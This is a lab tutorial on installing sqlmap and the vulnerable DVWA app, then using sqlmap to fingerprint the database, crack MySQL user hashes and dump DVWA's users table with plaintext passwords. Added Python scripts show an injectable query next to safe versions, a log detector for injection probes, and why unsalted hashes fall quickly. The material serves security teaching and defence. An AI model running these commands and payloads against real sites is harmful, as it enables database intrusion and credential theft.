Detecting SQL injection vulnerabilities with SQLmap
(1). What SQL injection is
  SQL injection means inserting SQL commands into a web form submission, an input field such as a domain name, or the query string of a page request, so that the server is tricked into executing malicious SQL. It abuses an existing application: by typing (malicious) SQL statements into a web form, an attacker can reach the database behind a vulnerable website. For example, many earlier leaks of VIP member passwords from video sites were caused by query strings submitted through web forms, and such forms are particularly prone to SQL injection. The leaks of account names and passwords from sites such as 12306 and CSDN may also have been caused by SQL injection.
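As an added illustration (example code, not part of the original page and not DVWA's own source), the following Python script shows the defect in miniature on an in-memory SQLite table shaped like DVWA's users table: a query assembled by string concatenation lets the id value rewrite the statement, while a parameterised query, and an integer check in front of it, do not. The table contents, column names and function names are constructed for this example.

```python
import sqlite3

# Constructed sample rows shaped like DVWA's users table (not the real DVWA data)
SAMPLE_USERS = [
    (1, "admin", "admin", "admin"),
    (2, "gordonb", "Gordon", "Brown"),
    (3, "1337", "Hack", "Me"),
    (4, "pablo", "Pablo", "Picasso"),
    (5, "smithy", "Bob", "Smith"),
]


def setup_db():
    """Create an in-memory database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """The injectable pattern: the id value is pasted into the SQL text,
    so quotes and keywords in it become part of the statement's grammar."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Parameterised query: the value travels separately from the SQL text and
    can only ever be compared as data, never parsed as SQL."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def is_valid_id(user_id):
    """Allowlist check for the id parameter: digits only (assumed to be the spec)."""
    return isinstance(user_id, str) and user_id.isdigit()


def lookup_validated(conn, user_id):
    """Defence in depth: reject malformed input before it reaches the database,
    then still use the parameterised query."""
    if not is_valid_id(user_id):
        raise ValueError("user_id must be a positive integer")
    return lookup_safe(conn, int(user_id))


if __name__ == "__main__":
    db = setup_db()
    probe = "1' OR '1'='1"          # tautology that the injectable query accepts
    print("normal id 2:", lookup_vulnerable(db, "2"))
    print("vulnerable, tautology input returns every row:", lookup_vulnerable(db, probe))
    print("parameterised, same input returns nothing:", lookup_safe(db, probe))
    try:
        lookup_validated(db, probe)
    except ValueError as err:
        print("validated, same input rejected:", err)
```

Run it directly to see the three behaviours side by side; the `lookup_vulnerable` function is the shape sqlmap is looking for in the experiment below, and the other two are the fixes a code review would ask for.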
(2). SQLmap
(3). Lab environment
youxi1  192.168.1.6  SQLmap
youxi2  192.168.1.7  DVWA penetration-testing practice system
(4). Install SQLmap on youxi1
  Install Python
[root@youxi1 ~]# yum -y install python
[root@youxi1 ~]# python -V
Python 2.7.5
  Then upload the downloaded SQLmap source archive, extract it and run it.
[root@youxi1 ~]# cd /usr/local/
[root@youxi1 local]# tar zxf sqlmapproject-sqlmap-1.0.
[root@youxi1 local]# ls
bin    include  libexec  sqlmapproject-sqlmap-1.0.
etc    lib      sbin    sqlmapproject-sqlmap-7eab1bc
games  lib64    share    src
[root@youxi1 local]# mv sqlmapproject-sqlmap-7eab1bc/ sqlmap/  //rename the directory
[root@youxi1 local]# cd sqlmap
[root@youxi1 sqlmap]# ls  //Python is interpreted
doc    lib      procs      shell        f  tamper      txt  waf
extra  plugins  README.md  sqlmapapi.py  sqlmap.py    thirdparty  udf  xml
[root@youxi1 sqlmap]# ./sqlmap.py  //Python is an interpreted language, like shell: no compilation step, the script runs directly
___
__H__
___ ___[.]_____ ___ ___  {1.0.10.24#dev}
|_ -| . [,]    | .'| . |
|___|_  [(]_|_|_|__,|  _|
|_|V          |_| 
Usage: python sqlmap.py [options]
sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), use -h for basic or -hh for advanced help
  Create a symbolic link
[root@youxi1 sqlmap]# ln -s /usr/local/sqlmap/sqlmap.py /usr/bin/sqlmap
[root@youxi1 sqlmap]# sqlmap -h
___
__H__
___ ___[.]_____ ___ ___  {1.0.10.24#dev}
|_ -| . [,]    | .'| . |
|___|_  [(]_|_|_|__,|  _|
|_|V          |_| 
Usage: python sqlmap [options]
......
(5). Install the DVWA penetration-testing practice system on youxi2
  Use yum to quickly set up the web stack (Apache httpd, PHP and MariaDB) and run a simple test
[root@youxi2 ~]# yum -y install httpd php php-mysql php-gd mariadb-server mariadb
[root@youxi2 ~]# systemctl start httpd && systemctl enable httpd  //start httpd and enable it at boot
Created symlink from /etc/systemd/system/multi-user.target.wants/httpd.service to /usr/lib/systemd/system/httpd.service.
[root@youxi2 ~]# systemctl start mariadb && systemctl enable mariadb  //start mariadb and enable it at boot
Created symlink from /etc/systemd/system/multi-user.target.wants/mariadb.service to /usr/lib/systemd/system/mariadb.service.
[root@youxi2 ~]# vim /var/www/html/test.php  //create a simple test page
<?php
phpinfo();
?>
[root@youxi2 ~]# mysqladmin -u root password "123456"  //set the MySQL root password
[root@youxi2 ~]# mysql -uroot -p123456  //try logging in
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 4
Server version: 5.5.60-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
  View the test page from a Windows browser
[root@youxi2 ~]# yum -y install unzip
[root@youxi2 ~]# unzip -d /var/www/html/ DVWA-1.9.zip
[root@youxi2 ~]# ls /var/www/html/
DVWA-1.9  test.php
[root@youxi2 ~]# chown -R apache:apache /var/www/html/DVWA-1.9/
[root@youxi2 ~]# vim /var/www/html/DVWA-1.9/config/config.inc.php  //edit the configuration file
$_DVWA[ 'db_password' ] = '123456';  //line 18: the database root password
  Two errors are reported at this point: "PHP function allow_url_include: Disabled" and "reCAPTCHA key: Missing". The first means PHP's allow_url_include setting must be turned on; the second means a reCAPTCHA public key and private key are required.
[root@youxi2 ~]# vim /etc/php.ini
allow_url_include = On  //line 815: enable allow_url_include
[root@youxi2 ~]# vim /var/www/html/DVWA-1.9/config/config.inc.php
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';  //lines 26 and 27
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';
[root@youxi2 ~]# systemctl restart httpd  //restart httpd
  Refresh the page; once the normal page shown below appears, installation can proceed
  After a successful login the following page is shown
(6). Extension: reCAPTCHA
 1) Concept
  CMU designed a powerful system called reCAPTCHA that lets their computers ask humans for help. Specifically, scanned images of text that OCR (optical character recognition) software cannot recognise are sent to major websites around the world to replace their existing CAPTCHA images; once those sites' users correctly identify the text, their answers are sent back to CMU.
  OCR overview: OCR (Optical Character Recognition) is the process in which an electronic device (such as a scanner or digital camera) examines characters printed on paper, determines their shapes by detecting patterns of dark and light, and then translates those shapes into computer text using character-recognition methods.
 2) Generating your own public and private keys for Google's free reCAPTCHA service
(7). Experiment
  SQLmap syntax: SQLmap's command-line options are grouped into Target options, Request options, Optimization, Injection, Detection, Techniques, Fingerprint, Enumeration and so on. Run sqlmap -h to see the details.
 1) Enumerate the database login user and basic information
  Before using SQLmap you need the current session's cookie and related information, which keeps the logged-in state alive during the test. Cookies (the plural form of cookie) are data (usually encrypted) that some websites store on the user's local terminal to identify the user and track the session. Once you have logged in to a site, a cookie is created locally; it is used mainly for identification and session tracking.
  How do you find the cookie values? In Google Chrome, press F12, open the Application tab, select Cookies, and the corresponding values can be read there.
  In addition, to make testing easier, DVWA's security level is set to Low here
  Prepare an SQL injection point
  Run sqlmap
[root@youxi1 sqlmap]# sqlmap -u "192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -b --current-db  --current-user ......
//The first prompt says the back-end DBMS looks like MySQL and asks whether to skip the test payloads for other DBMS types
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]Y
//The second prompt asks whether to include the additional MySQL-specific tests beyond the current level and risk values
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]n
......
//The third prompt asks whether to keep testing the other parameters
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]N
......
[19:33:07] [INFO] testing MySQL
[19:33:07] [INFO] confirming MySQL
[19:33:07] [INFO] the back-end DBMS is MySQL
[19:33:07] [INFO] fetching banner
web server operating system: Linux CentOS  //operating system
web application technology: Apache 2.4.6, PHP 5.4.16  //web stack
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner:    '5.5.60-MariaDB'  //MariaDB version
[19:33:07] [INFO] fetching current user
current user:    'root@localhost'  //current database user
[19:33:07] [INFO] fetching current database
current database:    'dvwa'  //current database
[19:33:07] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7'
[*] shutting down at 19:33:07
  sqlmap option descriptions:
    -u: the target URL (the SQL injection point);
    --cookie: the cookie value of the current session;
    -b: retrieve the DBMS banner, which identifies the database type;
    --current-db: retrieve the current database;
    --current-user: retrieve the user currently logged in to the database.
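From the defender's side, the run above produces a burst of requests to one URL whose id value carries quotes, UNION/SELECT or SLEEP() fragments, and by default sqlmap announces itself with a User-Agent beginning with sqlmap/ (that string can be changed with --user-agent or --random-agent, so it is a weak signal on its own). The following Python script is an added example, not part of the original page or of sqlmap: it scores Apache httpd combined-format access-log lines per client on those indicators. All log lines are constructed for the example, and the threshold of two probe-like values per client is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache httpd "combined" log line: client ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Generic injection-probe indicators, matched against each URL-decoded parameter value
PAYLOAD_RE = re.compile(
    r"'"                                      # stray quote that closes a string literal
    r"|\bunion\b.*\bselect\b"                 # UNION-based probing
    r"|\b(?:sleep|benchmark)\s*\("            # time-based probing against MySQL
    r"|\b(?:and|or)\b\s*[\w']+\s*=\s*[\w']+"  # boolean tautology such as AND 1=1
    r"|--\s",                                 # SQL comment terminator
    re.IGNORECASE,
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes once, so %27 becomes ' before the pattern check
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def analyze(lines):
    """Per-client summary: request count, probe-like parameter values, sqlmap User-Agent seen."""
    summary = defaultdict(lambda: {"requests": 0, "sqli_payloads": 0, "sqlmap_ua": False, "paths": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s = summary[rec["client"]]
        s["requests"] += 1
        s["paths"].add(rec["path"])
        if rec["ua"].lower().startswith("sqlmap/"):
            s["sqlmap_ua"] = True
        if any(PAYLOAD_RE.search(value) for _, value in rec["params"]):
            s["sqli_payloads"] += 1
    return dict(summary)


def flagged_clients(lines, min_payloads=2):
    """Clients that announce sqlmap, or send at least min_payloads probe-like values."""
    return sorted(
        client for client, s in analyze(lines).items()
        if s["sqlmap_ua"] or s["sqli_payloads"] >= min_payloads
    )


# Constructed sample log (not a real capture); 192.168.1.6 plays the sqlmap host from the lab above.
UA_SQLMAP = "sqlmap/1.0.10.24#dev (http://sqlmap.org)"
UA_BROWSER = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/90.0"
SQLI = "/DVWA-1.9/vulnerabilities/sqli/"


def _line(client, target, ua, ts="09/Aug/2021:19:33:07 +0800"):
    return f'{client} - - [{ts}] "GET {target} HTTP/1.1" 200 4312 "-" "{ua}"'


SAMPLE_LOG = [
    _line("192.168.1.6", SQLI + "?id=22&Submit=Submit", UA_SQLMAP),
    _line("192.168.1.6", SQLI + "?id=22%27%20AND%20%271%27%3D%271&Submit=Submit", UA_SQLMAP),
    _line("192.168.1.6", SQLI + "?id=22%20AND%20SLEEP%285%29&Submit=Submit", UA_SQLMAP),
    _line("192.168.1.6", SQLI + "?id=22%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20&Submit=Submit", UA_SQLMAP),
    _line("192.168.1.10", SQLI + "?id=2&Submit=Submit", UA_BROWSER),
    _line("192.168.1.10", "/DVWA-1.9/vulnerabilities/xss_r/?name=O%27Brien", UA_BROWSER),  # legitimate apostrophe
    _line("192.168.1.20", SQLI + "?id=22%27%20AND%20%271%27%3D%271&Submit=Submit", UA_BROWSER),  # browser UA, still probing
    _line("192.168.1.20", SQLI + "?id=22%27%20AND%20%271%27%3D%272&Submit=Submit", UA_BROWSER),
    "this line is not in combined log format",
]

if __name__ == "__main__":
    for client, s in sorted(analyze(SAMPLE_LOG).items()):
        print(client, s["requests"], "requests,", s["sqli_payloads"], "probe-like values, sqlmap UA:", s["sqlmap_ua"])
    print("flagged:", flagged_clients(SAMPLE_LOG))
```

The single apostrophe from 192.168.1.10 is why the decision combines a count with the User-Agent check rather than alerting on every quote: one O'Brien is normal traffic, while 192.168.1.20 is caught by repetition even though it hides the sqlmap banner.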
 2) Enumerate all MySQL database users and their password hashes; the hashes can later be cracked to recover the plaintext passwords
[root@youxi1 sqlmap]# sqlmap -u "192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" --string="Surname" --users --passwords ......
//Whether to store the hashes in a temporary file for later processing with other tools
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]y
......
//Whether to run a dictionary-based attack against the retrieved password hashes, i.e. resolve them to plaintext passwords
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]Y
[20:30:40] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
//1 uses the default dictionary (the default), 2 a custom dictionary file, 3 a file containing a list of dictionary files
[1] default dictionary file '/usr/local/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>  //default is 1
[20:33:18] [INFO] using default dictionary
//Whether to also try common password suffixes (slow!)
do you want to use common password suffixes? (slow!) [y/N]y
......
database management system users [6]:  //list of database users
[*] ''@'localhost'
[*] ''@'youxi2'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'youxi2'
......
[20:44:44] [INFO] starting dictionary-based cracking (mysql_passwd)
[20:44:44] [INFO] starting 4 processes
[20:44:44] [INFO] cracked password '123456' for user 'root'  //123456 is the root user's password
database management system users password hashes:
[*] root [2]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9  //hash of the password
clear-text password: 123456  //plaintext password
password hash: NULL
[20:44:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7'
  sqlmap option descriptions:
    --string: a string that appears in the page when the query is true, used to tell true from false responses;
    --users: enumerate DBMS users (DBMS = database management system);
    --passwords: enumerate the DBMS users' password hashes.
 3) Enumerate the tables in the dvwa database
[root@youxi1 sqlmap]# sqlmap -u "192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -D dvwa --tables
......
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users    |
+-----------+
[21:16:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7'
[*] shutting down at 21:16:09
  sqlmap option descriptions:
    -D: the DBMS database to enumerate;
    --tables: enumerate the tables in that DBMS database.
 4) Get the column names of the users table in the dvwa database
[root@youxi1 sqlmap]# sqlmap -u "192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -D dvwa -T users --columns ......
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column      | Type        |
+--------------+-------------+
| user        | varchar(15) |
| avatar      | varchar(70) |
| failed_login | int(3)      |
| first_name  | varchar(15) |
| last_login  | timestamp  |
| last_name    | varchar(15) |
| password    | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+
[21:25:29] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7'
[*] shutting down at 21:25:29
  sqlmap option descriptions:
    -T: the DBMS table to enumerate;
    --columns: enumerate all columns of that DBMS table.
 5) Dump the data: the users table in the dvwa database
[root@youxi1 sqlmap]# sqlmap -u "192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -D dvwa -T users -C user,password --dump ......
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]y
[21:46:06] [INFO] writing hashes to a temporary file '/tmp/sqlmapRAF75510073/sqlmaphashes-oREe'
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[21:46:20] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/local/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[21:46:33] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
Database: dvwa
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| admin  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)  |
| pablo  | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+
[21:47:05] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.1.7/dump/dvwa/users.csv'
[21:47:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7'
[*] shutting down at 21:47:05
  sqlmap option descriptions:
    --dump: dump the entries of the DBMS table.
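The two hash methods sqlmap reported, 'mysql_passwd' in step 2 and 'md5_generic_passwd' in step 5, explain why its dictionary attack finished within seconds: both are fast, unsalted functions, so the same password always yields the same hash (admin and smithy share 5f4dcc3b5aa765d61d8327deb882cf99 above) and one wordlist pass covers every user. The following Python script is an added example, not part of the original page, sqlmap or DVWA: it reproduces the two hash formats so the dumped values can be checked, finds users with identical hashes, and shows the salted, iterated storage (PBKDF2-HMAC-SHA256) that an application should use instead. The stored-string layout for PBKDF2 is an assumption of this example.

```python
import hashlib
import hmac
import os
import re
from collections import defaultdict
from typing import Optional


def mysql_native_hash(password: str) -> str:
    """MySQL PASSWORD() / mysql_native_password: '*' + SHA1(SHA1(pw)) in upper-case hex, no salt."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def md5_hash(password: str) -> str:
    """Unsalted MD5, the format in DVWA's users.password column (varchar(32))."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def identify(stored: str) -> str:
    """Classify a stored hash using the names sqlmap printed for its hash methods."""
    if re.fullmatch(r"\*[0-9A-F]{40}", stored):
        return "mysql_passwd"
    if re.fullmatch(r"[0-9a-f]{32}", stored):
        return "md5_generic_passwd"
    return "unknown"


def shared_password_groups(rows):
    """Users whose stored hashes are identical; with an unsalted hash that means identical passwords."""
    groups = defaultdict(list)
    for user, stored in rows:
        groups[stored].append(user)
    return {stored: users for stored, users in groups.items() if len(users) > 1}


# Hardened storage (layout assumed for this example): PBKDF2-HMAC-SHA256 with a random
# 16-byte salt and a high iteration count, written as algorithm$iterations$salt$hash.
def pbkdf2_store(password: str, salt: Optional[bytes] = None, iterations: int = 200_000) -> str:
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations))
    # constant-time comparison so verification timing does not leak how many bytes matched
    return hmac.compare_digest(dk.hex(), dk_hex)


# Rows copied from the users table dumped in step 5 above
DUMPED_USERS = [
    ("1337", "8d3533d75ae2c3966d7e0d4fcc69216b"),
    ("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    ("gordonb", "e99a18c428cb38d5f260853678922e03"),
    ("pablo", "0d107d09f5bbe40cade3de5c71e9e9b7"),
    ("smithy", "5f4dcc3b5aa765d61d8327deb882cf99"),
]

if __name__ == "__main__":
    print("PASSWORD('123456') =", mysql_native_hash("123456"))   # matches the root hash from step 2
    print("md5('password')    =", md5_hash("password"))            # matches admin and smithy from step 5
    print("same-hash groups   =", shared_password_groups(DUMPED_USERS))
    a, b = pbkdf2_store("password"), pbkdf2_store("password")
    print("salted hashes differ for the same password:", a != b)
    print("both still verify:", pbkdf2_verify("password", a) and pbkdf2_verify("password", b))
```

With salted PBKDF2 the two admin/smithy-style duplicates would look unrelated, and each guess has to be recomputed per user at 200,000 iterations, which is the cost difference that turns the instant result above into an impractical one.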
